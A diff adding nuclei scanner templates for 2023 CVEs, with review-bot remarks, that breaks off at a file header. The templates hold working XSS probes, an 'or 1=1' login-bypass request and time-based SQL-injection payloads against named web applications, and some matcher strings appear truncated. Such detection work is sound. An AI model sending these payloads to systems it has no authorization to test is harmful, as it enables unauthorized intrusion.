@@ -0,0 +1,44 @@ +id: CVE-2023-30868 + +info: + name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. + reference: + - https://www.exploit-db.com/exploits/51507 + - https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30868 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-30868 + cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml new file mode 100644 index 0000000000..1bb171133a --- /dev/null +++ b/http/cves/2023/CVE-2023-3219.yaml 
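Review bot: The reflection clause `'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E")'` looks for the URL-encoded payload, which any page that echoes the request URI into a link or form action will contain even when the value is correctly escaped, so the template also fires on patched installs; match the decoded form that only an unescaped reflection produces, `'contains(body_2, "<script>alert(document.domain)</script>")'`. `max-request: 1` undercounts the two raw requests (login plus the authenticated GET) and should be `max-request: 2`; CVE-2023-37979 has the same undercount. The description says "users with administrator privileges or higher can inject", which is the NVD wording but reads oddly for a reflected XSS whose victim is the administrator; "authenticated users can inject … which executes for administrators" is what the template actually exercises.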
@@ -0,0 +1,43 @@ +id: CVE-2023-3219 + +info: + name: EventON Lite < 2.1.2 - Arbitrary File Download + author: r3Y3r53 + severity: medium + description: | + The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors + to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post. + remediation: Fixed in version 2.1.2 + reference: + - https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd + - https://nvd.nist.gov/vuln/detail/CVE-2023-3219 + - https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html + - https://wordpress.org/plugins/eventon-lite/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/eventon-lite/" + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "BEGIN:VCALENDAR" + - "END:VCALENDAR" + condition: and + + - type: word + part: header + words: + - "text/Calendar" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml new file mode 100644 index 0000000000..84f1e69061 --- /dev/null +++ b/http/cves/2023/CVE-2023-33584.yaml 
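Review bot: The header word `"text/Calendar"` is matched case-sensitively, so a server that emits the canonical lowercase `text/calendar` is missed; use the lowercase form or add `case-insensitive: true` to that matcher. `event_id=1` is a reasonable probe because post ID 1 is a regular post on a default WordPress install, but a site where ID 1 is itself an event (or was deleted) answers differently on both fixed and vulnerable versions, so a comment such as `# post ID 1 is a normal post on a default install; a fixed plugin refuses to export it` would explain the choice to the next reader. The template also lacks the `classification` block that the other new templates carry.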
@@ -0,0 +1,41 @@ +id: CVE-2023-33584 + +info: + name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass + author: r3Y3r53 + severity: critical + description: | + Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. + reference: + - https://www.exploit-db.com/exploits/51501 + - https://nvd.nist.gov/vuln/detail/CVE-2023-33584 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-33584 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2023,sqli,exploitdb,unauth,enrollment + +http: + - raw: + - | + POST /enrollment/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username='+or+1%3D1+%23&password={{randstr}} + + - | + GET /enrollment/index.php?page=home HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml new file mode 100644 index 0000000000..374ede29be --- /dev/null +++ b/http/cves/2023/CVE-2023-34751.yaml 
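Review bot: The matcher mixes suffixed and unsuffixed response variables: `body_2` names the dashboard response, but `content_type` and `status_code` carry no suffix, so which response they test depends on nuclei's default for multi-request templates rather than being explicit; write `'contains(content_type_2, "text/html")'` and `'status_code_2 == 200'`. The `metadata` block lacks `max-request: 2` although the template sends two requests. The description is a five-sentence advisory paragraph; a one-line summary naming the login handler and the fact that the check confirms a reached dashboard would read better in a template.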
@@ -0,0 +1,49 @@ +id: CVE-2023-34751 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34751 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34751 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml new file mode 100644 index 0000000000..fa140566f1 --- /dev/null +++ b/http/cves/2023/CVE-2023-34752.yaml 
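Review bot: `duration>=6` is unsuffixed while `header_2` and `body_2` name the injected request explicitly; `duration_2>=6` ties the delay to the request that carries the sleep rather than to whichever response nuclei exposes by default. The request lines use `HTTP/2`, whereas the otherwise identical CVE-2023-34755 uses `HTTP/1.1`; as far as I can tell nuclei issues raw requests through its own client and does not honour the version string as written, so pick one form across CVE-2023-34751, CVE-2023-34752, CVE-2023-34753 and CVE-2023-34756. A 6 s sleep against a 10 s `@timeout` leaves little headroom on a loaded target; a comment on the second request such as `# sleep(6) under @timeout 10s: slow targets time out and report nothing rather than a false positive` would help triage.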
@@ -0,0 +1,49 @@ +id: CVE-2023-34752 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34752 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34752 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml new file mode 100644 index 0000000000..28649f89e9 --- /dev/null +++ b/http/cves/2023/CVE-2023-34753.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2023-34753 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34753 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34753 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml new file mode 100644 index 0000000000..1fe53e8b07 --- /dev/null +++ b/http/cves/2023/CVE-2023-34755.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2023-34755 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34755 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34755 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=user&action=edit HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml new file mode 100644 index 0000000000..f37ad8aba8 --- /dev/null +++ b/http/cves/2023/CVE-2023-34756.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2023-34756 + +info: + name: Bloofox v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit. + reference: + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://www.bloofox.com + - https://nvd.nist.gov/vuln/detail/CVE-2023-34756 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34756 + cwe-id: CWE-89 + metadata: + verified: true + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body_2, 'Admincenter') + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml new file mode 100644 index 0000000000..48ba7147df --- /dev/null +++ b/http/cves/2023/CVE-2023-36306.yaml 
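Review bot: `status_code == 200` and `contains(header, "text/html")` are unsuffixed while `body_2` is explicit; the four sibling bloofox templates use `header_2` throughout, so write `status_code_2 == 200` and `contains(header_2, "text/html")` here. The file ends without a trailing newline (`\ No newline at end of file`), unlike the rest of the batch. The name `Bloofox v0.5.2.1 - SQL Injection` also differs in casing from the `bloofoxCMS v0.5.2.1` used by the siblings, and the body check `'Admincenter'` is looser than their `'bloofoxCMS Admincenter'`.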
@@ -0,0 +1,32 @@ +id: CVE-2023-36306 + +info: + name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php + reference: + - https://www.exploit-db.com/exploits/51643 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36306 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36306 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer + +http: + - method: GET + path: + - "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' + condition: and diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 9ceb2a0c1a..94f7b3c7c9 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml 
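Review bot: The `metadata` block lacks `max-request: 1`, which the other single-request templates in the batch carry; the same omission is in CVE-2023-3843, CVE-2023-3844, CVE-2023-3845, CVE-2023-3846, CVE-2023-3847, CVE-2023-3848, CVE-2023-3849 and CVE-2023-39110. The reflection clause reads `'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")'`, and `contains(body, ">")` is true for any HTML page, so as printed the check carries no signal beyond the product name; if the rendering stripped the injected tag, confirm the committed file checks for the full reflected string, and the same applies to the empty or near-empty `contains` clauses in CVE-2023-37728, CVE-2023-37979, CVE-2023-3845, CVE-2023-3846, CVE-2023-3847, CVE-2023-3848 and CVE-2023-38501.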
@@ -1,16 +1,14 @@ id: CVE-2023-37728 info: - name: IceWarp Webmail Server - Cross-Site Scripting - author: technicaljunkie + name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting + author: technicaljunkie,r3Y3r53 severity: medium description: | - IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter. + Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. reference: + - https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311 - https://nvd.nist.gov/vuln/detail/CVE-2023-37728 - - https://medium.com/@ayush29/cve-2023-37728-6dfb7586311 - - http://icearp.com - - http://icewarp.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,32 +18,23 @@ info: epss-percentile: 0.18493 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: + max-request: 2 verified: true - max-request: 1 - vendor: icewarp - product: icewarp - shodan-query: title:"icewarp" - tags: cve,cve2023,xss,icewarp + shodan-query: http.favicon.hash:2144485375 + tags: cve,cve2023,icearp,icewarp,xss http: - method: GET path: - - '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27' + - "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27" + - "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27" - matchers-condition: and + stop-at-first-match: true matchers: - - type: word - part: body - words: - - '><' - - 'IceWarp' + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' + - 'contains(body, "")' condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 
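Review bot: The `info` rewrite drops `vendor: icewarp` and `product: icewarp` from metadata, fields that the repository's enrichment uses for indexing, and they should stay even though the shodan query and author list change; the same churn of generated fields shows up in the CVE-2023-38501 hunk. The new description "Icewarp Icearp v10.2.1 was discovered to contain…" is the NVD summary pasted verbatim and is less precise than the line it replaces, which named the `/webmail/` endpoint; keep the endpoint in the description. The title change from "Cross-Site Scripting" to "Cross Site Scripting" departs from the hyphenated form used across the repository and in the other templates of this batch.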
diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml new file mode 100644 index 0000000000..01ac83819e --- /dev/null +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-37979 + +info: + name: Ninja Forms < 3.6.26 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + remediation: Fixed in version 3.6.26 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-37979 + - https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348 + - https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-37979 + cwe-id: CWE-79 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/ninja-forms/" + tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "import_form_template")' + - 'status_code_2 == 200' + condition: and 
diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml new file mode 100644 index 0000000000..25fbdd4e8e --- /dev/null +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-3843 +info: + name: mooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly. + reference: + - https://www.exploit-db.com/exploits/51628 + - https://nvd.nist.gov/vuln/detail/CVE-2023-3843 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3843 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,exploitdb,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains(body, ">w71ch") && contains(body, "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml new file mode 100644 index 0000000000..130b0fe3b1 --- /dev/null +++ b/http/cves/2023/CVE-2023-3844.yaml 
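Review bot: `id: CVE-2023-3843` is followed directly by `info:` with no blank line, unlike every other template in the batch; CVE-2023-3849 has the same layout. The description pastes the VulDB advisory text including "VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor…", which describes the disclosure process rather than the check; trim it to the first three sentences. A 404 is the expected status because the token is appended to the path, so a comment such as `# the token lands in the path, so the reflection is on the 404 page` would stop the next reader from taking `status_code == 404` for a mistake.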
@@ -0,0 +1,32 @@ +id: CVE-2023-3844 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3844 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3844 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">r5c3m", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml new file mode 100644 index 0000000000..579c1952ac --- /dev/null +++ b/http/cves/2023/CVE-2023-3845.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2023-3845 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3845 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3845 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml new file mode 100644 index 0000000000..1850a020ef --- /dev/null +++ b/http/cves/2023/CVE-2023-3846.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2023-3846 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3846 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3846 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml new file mode 100644 index 0000000000..6d297ef141 --- /dev/null +++ b/http/cves/2023/CVE-2023-3847.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2023-3847 + +info: + name: MooDating 1.2 - Cross-Site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3847 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3847 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">","mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml new file mode 100644 index 0000000000..332aad050e --- /dev/null +++ b/http/cves/2023/CVE-2023-3848.yaml 
